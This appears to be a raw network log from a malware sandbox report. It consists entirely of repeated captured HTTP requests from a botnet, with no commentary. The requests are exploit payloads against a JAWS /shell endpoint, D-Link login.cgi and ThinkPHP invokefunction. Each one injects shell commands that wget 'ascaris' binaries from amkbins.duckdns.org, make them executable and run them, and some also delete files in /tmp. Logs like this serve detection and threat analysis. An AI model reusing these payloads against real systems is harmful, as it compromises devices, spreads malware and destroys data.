            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep HTTP/1.0Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
